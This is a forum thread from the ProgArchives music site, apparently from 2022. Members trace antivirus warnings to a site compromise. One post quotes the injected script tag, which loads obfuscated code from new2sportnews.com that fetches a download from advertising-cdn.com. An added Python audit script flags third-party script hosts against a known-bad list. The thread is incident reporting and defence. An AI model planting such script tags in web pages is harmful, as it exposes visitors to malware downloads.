Download denied
Nogbad_The_Bad
Forum & Site Admin Group RIO/Avant/Zeuhl & Eclectic Team Joined: March 16 2007 Location: Boston Status: Offline Points: 20850
Posted: October 06 2022 at 12:29
That's what I'm watching.
Ian
Host of the Post-Avant Jazzcore Happy Hour on Progrock.com https://podcasts.progrock.com/post-avant-jazzcore-happy-hour/
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030
PA is well behind in its version of the forum software but I don't suppose it's going to get upgraded any time soon since M@x seems to have abandoned it. I'm thinking PA is dying a slow death now, at some point the forum software will stop working (it's probably out of support now).
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423
Apparently PA uses Web Wiz Forums software, version 11.01 (released 10 Sep 2014). The latest version is 12.05 (released 18 Jan 2022). I did a search for Web Wiz vulnerabilities, and found that many versions, beginning with v6.34 and extending through v10.03, were identified as having vulnerability to cross-site scripting (XSS) attacks. That's a lot of versions for which they never fixed the problem, and it still might be present in v11.01.
https://www.cvedetails.com/cve/CVE-2006-0175/
https://www.exploit-db.com/exploits/28589
https://vulmon.com/searchpage?q=web+wiz+forum
https://www.nmmapper.com/st/exploitdetails/37678/36689/web-wiz-forums-multiple-cross-site-scripting-vulnerabilitiesdownload/
Edited by wiz_d_kidd - October 06 2022 at 10:10
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423
I'm not sure how this website works, but the root infection might actually be in the code that generates and updates the pages your browser receives. Removing the bad script from the output pages might not fix the problem, if it gets added again the next time the page refreshes. So far, this is the status of the pages I'm aware of:
Main - not infected
Forums - infected
Prog Rock Guides - infected
Log In - not infected
Prog Radios - not infected
Prog Links - not infected
FAQ - infected
About Us - not infected
The bad script occurs multiple times on some of these pages, not just once.
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030
Presumably this is a fairly simple code change to remove references to that script from the code? Can you tell which pages are impacted?
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423
The website https://new2sportnews.com, and the script (progarchives.js) are still there, but that script invokes another script (of unknown name) at https://advertising-cdn.com which is now offline. I agree with you that they can relaunch a future attack with ease now that they have the "hooks" built into PA. This all smacks of a Reflected Cross-Site Scripting (XSS) attack, which is explained here: https://portswigger.net/web-security/cross-site-scripting
Edited by wiz_d_kidd - October 05 2022 at 10:18
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030
Edge developer tools are throwing up an error on that web page. I'm not an expert on this, but that suggests to me that the script is not being executed; however, that would be the case if the web site is no longer there, but it does leave PA open to future attacks, I would guess.
chopper
Special Collaborator Honorary Collaborator Joined: July 13 2005 Location: Essex, UK Status: Offline Points: 20030
Wow, that is worrying, thanks for doing this.
Do you know the name of the file that it attempts to download? My anti-virus is not picking anything up but, as you say, this could be a serious problem. It's a shame M@x no longer does anything with PA.
wiz_d_kidd
Forum Senior Member Joined: January 13 2018 Location: EllicottCityMD Status: Offline Points: 1423
It seems that many users, myself included, have had similar issues. I've spent considerable time digging into the source of the problem. The upshot is that ProgArchives appears to have been hacked!

Back in August, I began getting warnings from Norton Antivirus about malicious activity (i.e. intrusion detections) when I visit the "Forums" or "Prog Rock Guides" pages. But it doesn't happen on the "About Us" page, or the main page. The problem is that the HTML code for the Forums and Guides pages (and probably others) contains malicious javascript that looks like this:

<script src="https://new2sportnews.com/progarchives.js" type="d597b4f971c3864a4c6a613f-text/javascript"></script>

The referenced site, new2sportnews.com, has the appearance of the Nigerian version of The Guardian website. However, it is a bogus web site. It was created in Jan 2021 and had no content until Jun 2022, and the content (according to the internet's Wayback Machine) has not changed since then. The javascript that is stored at that site (i.e. https://new2sportnews.com/progarchives.js) and is being executed unconditionally by Progarchives, is highly obfuscated to hide its function. I ran it through an "unobfuscator" and confirmed that the script redirects the user to a site called "advertising-cdn.com" which attempts to download a file to the user's computer. The nature of the file is unknown. It could be password stealing, keystroke interception, or other nefarious functions.

I also checked Progarchives using the Wayback Machine and determined that it was clean as of July 19th. Sometime after that is when the system was hacked. Users, myself included, began experiencing problems around Aug 7th. After an update to my Norton Antivirus, it started completely blocking my access to the forums because I couldn't stop it from executing the malicious javascript. I could disable javascript entirely, but then I could not post or vote in polls.

My solution was to install the NoScript add-on to Firefox, and disable scripts specifically for new2sportnews.com. That seems to have worked, at least for now. The target site, advertising-cdn.com, which contains the downloader script, appeared to be a valid site at first, but now it is gone. The hackers could be working on a different attack.

I've contacted PA admins through every means possible. Thanks to Ian (aka Nogbad the Bad) for forwarding private messages that I sent him on Progressive ears. I also contacted the site owners/admins through GoDaddy, but so far no one has responded. I hope that our site admins fix this infection before its users are seriously attacked. There is no valid reason that the HTML code for this site should be executing a javascript on a bogus website!

To check for yourself, look at the page source HTML (in Firefox right-click anywhere on a page and select "View Page Source"), then search for new2sportnews.com. If you find it, you've confirmed that the site has been hacked and can potentially cause serious harm to its users (if it hasn't already).
“I don’t like country music, but I don’t mean to denigrate those who do. And for those who like country music, denigrate means to ‘put down.'” – Bob Newhart
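The manual check described in the post above (view the page source and search for the injected host), and the per-page infected/not-infected list in the later wiz_d_kidd post, can be automated as an allowlist audit of every external script a page loads. The script below is an added example written for this thread; it is not code from ProgArchives, Web Wiz Forums or either poster. It assumes a first-party host allowlist for progarchives.com (an assumption; adjust for the site being audited) and runs over two constructed sample pages that embed the exact script tag quoted in the post. One detail worth handling: the odd type attribute `d597b4f971c3864a4c6a613f-text/javascript` is a hex hash, a dash and then the real MIME type, the same shape Cloudflare's Rocket Loader gives script tags it rewrites, so the audit strips that prefix before deciding whether the browser would execute the tag rather than treating the strange type as a sign the tag is inert.

```python
"""Audit HTML pages for <script src=...> tags that load from hosts outside a
first-party allowlist.  Added example, not code from the thread, ProgArchives
or Web Wiz Forums.  The allowlist and the sample pages below are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site is assumed to serve its own scripts from (assumption; adjust per site).
FIRST_PARTY_HOSTS = {"progarchives.com", "www.progarchives.com"}

# Hosts named in the thread as the injected script and its second stage.
KNOWN_BAD_HOSTS = {"new2sportnews.com", "advertising-cdn.com"}

# A type such as "d597b4f971c3864a4c6a613f-text/javascript" is a hex hash, a
# dash, then the real MIME type; strip the prefix before judging executability.
_HASH_PREFIX = re.compile(r"^[0-9a-f]{16,}-")
EXECUTABLE_TYPES = {"", "text/javascript", "application/javascript", "module"}


class ScriptSrcCollector(HTMLParser):
    """Collect (src, type) for every <script> tag that has a src attribute."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append((a["src"], a.get("type") or ""))


def normalize_type(type_attr):
    """Lower-case the type attribute and drop a leading hex-hash prefix."""
    return _HASH_PREFIX.sub("", type_attr.strip().lower())


def script_host(src, page_host):
    """Host a script src is fetched from; relative URLs resolve to the page host."""
    netloc = urlparse(src).netloc.lower()
    if not netloc:
        return page_host
    # Drop any userinfo and port so the host compares cleanly against the allowlist.
    return netloc.rsplit("@", 1)[-1].split(":", 1)[0]


def audit_page(html, page_host, allowlist=FIRST_PARTY_HOSTS):
    """Return one finding per script tag whose host is not first-party."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    findings = []
    for src, type_attr in collector.scripts:
        host = script_host(src, page_host)
        if host in allowlist:
            continue
        findings.append({
            "src": src,
            "host": host,
            "type": type_attr,
            "executable": normalize_type(type_attr) in EXECUTABLE_TYPES,
            "verdict": "known-bad" if host in KNOWN_BAD_HOSTS else "unexpected-third-party",
        })
    return findings


def summarize(pages, page_host="www.progarchives.com"):
    """Map each page name to 'infected', 'review' or 'clean'."""
    status = {}
    for name, html in pages.items():
        findings = audit_page(html, page_host)
        if any(f["verdict"] == "known-bad" for f in findings):
            status[name] = "infected"
        elif findings:
            status[name] = "review"
        else:
            status[name] = "clean"
    return status


# Constructed sample pages; the injected tag is the one quoted in the thread,
# and it appears twice because the post notes it occurs multiple times per page.
SAMPLE_PAGES = {
    "Forums": (
        '<html><head><script src="/js/forum.js"></script>'
        '<script src="https://www.progarchives.com/js/site.js" type="text/javascript"></script>'
        '<script src="https://new2sportnews.com/progarchives.js" '
        'type="d597b4f971c3864a4c6a613f-text/javascript"></script></head>'
        '<body><script src="https://new2sportnews.com/progarchives.js"></script></body></html>'
    ),
    "About Us": '<html><head><script src="/js/site.js"></script></head><body></body></html>',
}

if __name__ == "__main__":
    for page, status in summarize(SAMPLE_PAGES).items():
        print(f"{page}: {status}")
        for f in audit_page(SAMPLE_PAGES[page], "www.progarchives.com"):
            print(f"  {f['verdict']}: {f['src']} (executable={f['executable']})")
```

Pointing `SAMPLE_PAGES` at real fetched HTML turns this into a repeatable check that can be run after every deploy: a "known-bad" verdict means the injected tag is back, and an "unexpected-third-party" verdict is a new external script host that someone should be able to account for.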
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
I should remark that it was only yesterday's "Download denied" notifications that were caused by the VPN. The original problem that lasted more than a month was not caused by the VPN. I don't use the VPN to visit this site and it was quite by accident without realising that it was still on that it was in use while I was visiting this site yesterday.
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
^ VPN server in London –> "Download denied" notification.
VPN server in Sydney –> "Download denied" notification.
So, it appears that the problem is with the VPN.
Edited by I prophesy disaster - September 23 2022 at 15:56
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
I just discovered something quite interesting: I have a VPN which I sometimes use and sometimes don't use, depending on what I'm doing. When I'm not using the VPN, I don't get the "Download denied" notification. But when I do use the VPN (server in Los Angeles), I get the notifications. I haven't yet tried the VPN server in other available locations, so I don't know if the problem is with the VPN or the location.
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
^And the "PROG ROCK GUIDES" and "FAQ" links.
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
Actually, it does occur when I click on any of the "PROG SUB-GENRES" links.
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Cristi
Special Collaborator Crossover / Prog Metal Teams Joined: July 27 2006 Location: wonderland Status: Online Points: 43717
I played with the antivirus settings, trial and error. I got it right in the end. I don't use Google Chrome for PA anymore.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
^ This problem is only occurring on the forum pages, not on the database pages. But it does occur every time I click on any link in the forum.
How did you solve your problem (if it isn't too involved to say)?
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Cristi
Special Collaborator Crossover / Prog Metal Teams Joined: July 27 2006 Location: wonderland Status: Online Points: 43717
I had some problems a few months ago, but it was my antivirus that didn't let me see any album pages because of "phishing". I solved the problem but it took me a little while.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
^ This is the only site where it happens. And there was another topic started by wiz_d_kidd reporting something similar: Intrusion Detected from PA. That topic referred to the same website, but I think the difference might be due to different security software. It is the security software that is producing the notifications.
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.
Cristi
Special Collaborator Crossover / Prog Metal Teams Joined: July 27 2006 Location: wonderland Status: Online Points: 43717
^ It does not seem to be PA's fault for what's going on there. I think your browser is stuck on some weird ads, trackers and the like.
I prophesy disaster
Forum Senior Member Joined: December 31 2017 Location: Australia Status: Online Points: 4780
That's the notification I get. I have no idea to what "download" is referring. I assume it's something that the https://advertising-cdn.com website is trying to download onto my computer.
I have four browsers on my computer, but I mostly use only two of them: Edge and Chrome. I use Edge for sites that keep me logged on, such as this site, and Chrome for things I'd rather clear my browser history, cookies, etc. I have Firefox but I don't like it.
No, I know how to behave in the restaurant now, I don't tear at the meat with my hands. If I've become a man of the world somehow, that's not necessarily to say I'm a worldly man.